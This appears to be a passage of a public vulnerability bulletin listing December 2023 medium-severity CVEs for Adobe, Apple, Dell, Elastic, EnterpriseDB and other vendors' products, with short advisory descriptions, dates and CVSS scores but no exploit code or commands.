Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48591
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48592
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48593
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48594
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48595
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48596
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48597
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48598
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48599
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48600
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48601
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48602
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48603
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48604
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48605
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48606
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48607
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48609
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48610
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48611
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48612
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48613
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48614
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48615
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48616
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48617
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48618
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48619
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48620
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48621
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48622
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48623
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48624
[email protected]
adobe -- indesign
Adobe InDesign versions 19.0 (and earlier) and 17.4.2 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-47076
[email protected]
adobe -- indesign
Adobe InDesign versions 19.0 (and earlier) and 17.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-47077
[email protected]
adobe -- prelude
Adobe Prelude versions 22.6 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-44362
[email protected]
adobe -- substance_3d_designer
Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-48636
[email protected]
adobe -- substance_3d_designer
Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-48637
[email protected]
adobe -- substance_3d_designer
Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-48638
[email protected]
adobe -- substance_3d_stager
Adobe Substance 3D Stager versions 2.1.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-47080
[email protected]
adobe -- substance_3d_stager
Adobe Substance 3D Stager versions 2.1.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2023-12-13
5.5
CVE-2023-47081
[email protected]
alkacon -- opencms
Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to a victim and partially take control of their browsing session.
2023-12-13
6.1
CVE-2023-6379
[email protected]
alkacon -- opencms
Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template. An attacker could create a specially crafted URL and send it to a specific user to redirect them to a malicious site and compromise them. Exploitation of this vulnerability is possible due to the fact that there is no proper sanitization of the 'URI' parameter.
2023-12-13
6.1
CVE-2023-6380
[email protected]
ansible -- ansible
A template injection flaw was found in Ansible where a user's controller internal templating operations may remove the unsafe designation from template data. This issue could allow an attacker to use a specially crafted file to introduce code injection when supplying templating data.
2023-12-12
6.6
CVE-2023-5764
[email protected]
[email protected]
[email protected]
apple -- ios/ipados
The issue was addressed with improved checks. This issue is fixed in iOS 17.2 and iPadOS 17.2. An attacker with physical access may be able to use Siri to access sensitive user data.
2023-12-12
4.6
CVE-2023-42897
[email protected]
[email protected]
apple -- ipados
The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, macOS Ventura 13.6.3, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. An app may be able to break out of its sandbox.
2023-12-12
6.3
CVE-2023-42914
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
apple -- ipados
This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, macOS Ventura 13.6.3, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3. An app may be able to disclose kernel memory.
2023-12-12
5.5
CVE-2023-42884
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
apple -- ipados
The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2, watchOS 10.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2. Processing an image may lead to arbitrary code execution.
2023-12-12
5.5
CVE-2023-42898
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
apple -- ipados
A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, macOS Ventura 13.6.3, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. An app may be able to access sensitive user data.
2023-12-12
5.5
CVE-2023-42919
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
apple -- ipados
This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, macOS Ventura 13.6.3, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. An app may be able to read sensitive location information.
2023-12-12
5.5
CVE-2023-42922
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
apple -- ipados
This issue was addressed through improved state management. This issue is fixed in iOS 17.2 and iPadOS 17.2. Private Browsing tabs may be accessed without authentication.
2023-12-12
5.3
CVE-2023-42923
[email protected]
[email protected]
apple -- ipados
A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2. An app may be able to access sensitive user data.
2023-12-12
5.5
CVE-2023-42927
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
apple -- macos
An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to monitor keystrokes without user permission.
2023-12-12
5.5
CVE-2023-42891
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
apple -- macos
This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to access information about a user's contacts.
2023-12-12
5.5
CVE-2023-42894
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
apple -- macos
The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2. An app may be able to access user-sensitive data.
2023-12-12
5.5
CVE-2023-42900
[email protected]
[email protected]
apple -- macos
A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3. An app may be able to access sensitive user data.
2023-12-12
5.5
CVE-2023-42924
[email protected]
[email protected]
[email protected]
[email protected]
apple -- macos
A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to access protected user data.
2023-12-12
5.5
CVE-2023-42932
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
apple -- multiple_products
The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3. Processing an image may lead to a denial-of-service.
2023-12-12
5.5
CVE-2023-42883
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
archerirm -- archer
Archer Platform 6.x before 6.13 P2 (6.13.0.2) contains an authenticated HTML content injection vulnerability. A remote authenticated malicious Archer user could potentially exploit this to store malicious HTML code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable application. 6.14 (6.14.0) is also a fixed release.
2023-12-12
5.4
CVE-2023-48642
[email protected]
arduino -- create-agent
The Arduino Create Agent allows users to use the Arduino Create applications to upload code to any USB connected Arduino board directly from the browser. A vulnerability in versions prior to 1.3.6 affects the endpoint /certificate.crt and the way the web interface of the ArduinoCreateAgent handles custom error messages. An attacker that is able to persuade a victim into clicking on a malicious link can perform a Reflected Cross-Site Scripting attack on the web interface of the create agent, which would allow the attacker to execute arbitrary browser client side code. Version 1.3.6 contains a fix for the issue.
2023-12-13
6.3
CVE-2023-49296
[email protected]
[email protected]
arm -- cortex-a77_firmware
Cortex-A77 cores (r0p0 and r1p0) are affected by erratum 1508412 where software, under certain circumstances, could deadlock a core due to the execution of either a load to device or non-cacheable memory, and either a store exclusive or register read of the Physical Address Register (PAR_EL1) in close proximity.
2023-12-08
5.5
CVE-2023-34320
[email protected]
asterisk -- asterisk
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the live_dangerously is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.
2023-12-14
4.9
CVE-2023-49294
[email protected]
[email protected]
[email protected]
aveva -- edge
An issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts' responses.
2023-12-16
5.3
CVE-2021-42794
[email protected]
[email protected]
[email protected]
beckhoff -- twincat/bsd
The package authelia-bhf included in Beckhoffs TwinCAT/BSD is prone to an open redirect that allows a remote unprivileged attacker to redirect a user to another site. This may have limited impact to integrity and does solely affect anthelia-bhf the Beckhoff fork of authelia.
2023-12-14
4.3
CVE-2023-6545
[email protected]
[email protected]
bitcoin -- bitcoin_core
In Bitcoin Core through 26.0 and Bitcoin Knots before 25.1.knots20231115, datacarrier size limits can be bypassed by obfuscating data as code (e.g., with OP_FALSE OP_IF), as exploited in the wild by Inscriptions in 2022 and 2023.
2023-12-09
5.3
CVE-2023-50428
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
caddyserver -- caddy
The caddy-geo-ip (aka GeoIP) middleware through 0.6.0 for Caddy 2, when trust_header X-Forwarded-For is used, allows attackers to spoof their source IP address via an X-Forwarded-For header, which may bypass a protection mechanism (trusted_proxy directive in reverse_proxy or IP address range restrictions).
2023-12-10
6.5
CVE-2023-50463
[email protected]
[email protected]
[email protected]
canonical -- ubuntu_server
A feature in LXD (LP#1829071), affects the default configuration of Ubuntu Server which allows privileged users in the lxd group to escalate their privilege to root without requiring a sudo password.
2023-12-12
5
CVE-2023-5536
[email protected]
[email protected]
[email protected]
[email protected]
cisco -- adaptive_security_appliance_software
A vulnerability in the AnyConnect SSL VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to send packets with another VPN user's source IP address. This vulnerability is due to improper validation of the packet's inner source IP address after decryption. An attacker could exploit this vulnerability by sending crafted packets through the tunnel. A successful exploit could allow the attacker to send a packet impersonating another VPN user's IP address. It is not possible for the attacker to receive return packets.
2023-12-12
4.3
CVE-2023-20275
[email protected]
ckan -- ckan
CKAN is an open-source data management system for powering data hubs and data portals. Starting in version 2.0.0 and prior to versions 2.9.10 and 2.10.3, when submitting a POST request to the /dataset/new endpoint (including either the auth cookie or the Authorization header) with a specially-crafted field, an attacker can create an out-of-memory error in the hosting server. To trigger this error, the attacker need to have permissions to create or edit datasets. This vulnerability has been patched in CKAN 2.10.3 and 2.9.10.
2023-12-13
4.5
CVE-2023-50248
[email protected]
[email protected]
cloudflare -- quiche
quiche v. 0.15.0 through 0.19.0 was discovered to be vulnerable to unbounded queuing of path validation messages, which could lead to excessive resource consumption. QUIC path validation (RFC 9000 Section 8.2) requires that the recipient of a PATH_CHALLENGE frame responds by sending a PATH_RESPONSE. An unauthenticated remote attacker can exploit the vulnerability by sending PATH_CHALLENGE frames and manipulating the connection (e.g. by restricting the peer's congestion window size) so that PATH_RESPONSE frames can only be sent at the slower rate than they are received; leading to storage of path validation data in an unbounded queue. Quiche versions greater than 0.19.0 address this problem.
2023-12-12
5.3
CVE-2023-6193
[email protected]
[email protected]
codeastro -- pos_and_inventory_management_system
A vulnerability has been found in CodeAstro POS and Inventory Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /accounts_con/register_account of the component User Creation Handler. The manipulation of the argument account_type with the input Admin leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247909 was assigned to this vulnerability.
2023-12-13
4.3
CVE-2023-6773
[email protected]
[email protected]
[email protected]
codeastro -- pos_and_inventory_management_system
A vulnerability was found in CodeAstro POS and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /accounts_con/register_account. The manipulation of the argument Username with the input leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247910 is the identifier assigned to this vulnerability.
2023-12-13
4.3
CVE-2023-6774
[email protected]
[email protected]
[email protected]
collaboraoffice -- richdocumentscode
Collabora Online is a collaborative online office suite based on LibreOffice technology. Users of Nextcloud with Collabora Online - Built-in CODE Server app can be vulnerable to attack via proxy.php. The bug was fixed in Collabora Online - Built-in CODE Server (richdocumentscode) release 23.5.601. Users are advised to upgrade. There are no known workarounds for this vulnerability.
2023-12-08
6.1
CVE-2023-49782
[email protected]
[email protected]
cube-js -- cube
Cube is a semantic layer for building data applications. Prior to version 0.34.34, it is possible to make the entire Cube API unavailable by submitting a specially crafted request to a Cube API endpoint. The issue has been patched in v0.34.34 and it's recommended that all users exposing Cube APIs to the public internet upgrade to the latest version to prevent service disruption. There are currently no workaround for older versions, and the recommendation is to upgrade.
2023-12-13
6.5
CVE-2023-50709
[email protected]
[email protected]
dedecms -- dedecms
DedeCMS v5.7.111 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component select_media_post_wangEditor.php.
2023-12-11
6.1
CVE-2023-49494
[email protected]
[email protected]
dell -- powerprotect_dd
Dell PowerProtect DD , versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain a path traversal vulnerability. A local high privileged attacker could potentially exploit this vulnerability, to gain unauthorized read and write access to the OS files stored on the server filesystem, with the privileges of the running application.
2023-12-14
6.7
CVE-2023-44278
[email protected]
dell -- powerprotect_dd
Dell PowerProtect DD , versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an OS command injection vulnerability in administrator CLI. A local high privileged attacker could potentially exploit this vulnerability, to bypass security restrictions. Exploitation may lead to a system take over by an attacker
2023-12-14
6.7
CVE-2023-44279
[email protected]
dell -- powerprotect_dd
Dell PowerProtect DD , versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an SQL Injection vulnerability. A remote low privileged attacker could potentially exploit this vulnerability, leading to the execution of certain SQL commands on the application's backend database causing unauthorized read access to application data.
2023-12-14
4.3
CVE-2023-44284
[email protected]
dell -- vapp_manager
Dell vApp Manager, versions prior to 9.2.4.x contain an arbitrary file read vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability to read arbitrary files from the target system.
2023-12-14
4.9
CVE-2023-48661
[email protected]
dompdf -- dompdf
Dompdf is an HTML to PDF converter for PHP. When parsing SVG images Dompdf performs an initial validation to ensure that paths within the SVG are allowed. One of the validations is that the SVG document does not reference itself. However, prior to version 2.0.4, a recursive chained using two or more SVG documents is not correctly validated. Depending on the system configuration and attack pattern this could exhaust the memory available to the executing process and/or to the server itself. php-svg-lib, when run in isolation, does not support SVG references for image elements. However, when used in combination with Dompdf, php-svg-lib will process SVG images referenced by an image element. Dompdf currently includes validation to prevent self-referential image references, but a chained reference is not checked. A malicious actor may thus trigger infinite recursion by chaining references between two or more SVG images. When Dompdf parses a malicious payload, it will crash due after exceeding the allowed execution time or memory usage. An attacker sending multiple request to a system can potentially cause resource exhaustion to the point that the system is unable to handle incoming request. Version 2.0.4 contains a fix for this issue.
2023-12-13
5.3
CVE-2023-50262
[email protected]
[email protected]
[email protected]
elastic -- elastic_agent
An issue was discovered by Elastic whereby Elastic Agent would log a raw event in its own logs at the WARN or ERROR level if ingesting that event to Elasticsearch failed with any 4xx HTTP status code except 409 or 429. Depending on the nature of the event that Elastic Agent attempted to ingest, this could lead to the insertion of sensitive or private information in the Elastic Agent logs. Elastic has released 8.11.3 and 7.17.16 that prevents this issue by limiting these types of logs to DEBUG level logging, which is disabled by default.
2023-12-12
6.8
CVE-2023-6687
[email protected]
elastic -- enterprise_search
An issue was discovered by Elastic whereby the Documents API of App Search logged the raw contents of indexed documents at INFO log level. Depending on the contents of such documents, this could lead to the insertion of sensitive or private information in the App Search logs. Elastic has released 8.11.2 and 7.17.16 that resolves this issue by changing the log level at which these are logged to DEBUG, which is disabled by default.
2023-12-12
6.8
CVE-2023-49923
[email protected]
[email protected]
elastic -- multiple_products
An issue was discovered by Elastic whereby Beats and Elastic Agent would log a raw event in its own logs at the WARN or ERROR level if ingesting that event to Elasticsearch failed with any 4xx HTTP status code except 409 or 429. Depending on the nature of the event that Beats or Elastic Agent attempted to ingest, this could lead to the insertion of sensitive or private information in the Beats or Elastic Agent logs. Elastic has released 8.11.3 and 7.17.16 that prevents this issue by limiting these types of logs to DEBUG level logging, which is disabled by default.
2023-12-12
6.8
CVE-2023-49922
[email protected]
elecom -- wrc-x3000gsn_firmware
OS command injection vulnerability in WRC-X3000GSN v1.0.2, WRC-X3000GS v1.0.24 and earlier, and WRC-X3000GSA v1.0.24 and earlier allows a network-adjacent attacker with an administrative privilege to execute an arbitrary OS command by sending a specially crafted request to the product.
2023-12-12
6.8
CVE-2023-49695
[email protected]
[email protected]
enalean -- tuleap
Tuleap is an open source suite to improve management of software developments and collaboration. Prior to version 15.2.99.103 or Tuleap Community Edition and prior to versions 15.2-4 and 15.1-8 of Tuleap Enterprise Edition, the name of the releases are not properly escaped on the edition page of a release. A malicious user with the ability to create a FRS release could force a victim having write permissions in the FRS to execute uncontrolled code. Tuleap Community Edition 15.2.99.103, Tuleap Enterprise Edition 15.2-4, and Tuleap Enterprise Edition 15.1-8 contain a fix for this issue.
2023-12-11
5.4
CVE-2023-48715
[email protected]
[email protected]
[email protected]
[email protected]
enterprisedb -- postgres_advanced_server
An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It contains the functions get_url_as_text and get_url_as_bytea that are publicly executable, thus permitting an authenticated user to read any file from the local filesystem or remote system regardless of that user's permissions.
2023-12-12
6.5
CVE-2023-41114
[email protected]
enterprisedb -- postgres_advanced_server
An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. When using UTL_ENCODE, an authenticated user can read any large object, regardless of that user's permissions.
2023-12-12
6.5
CVE-2023-41115
[email protected]
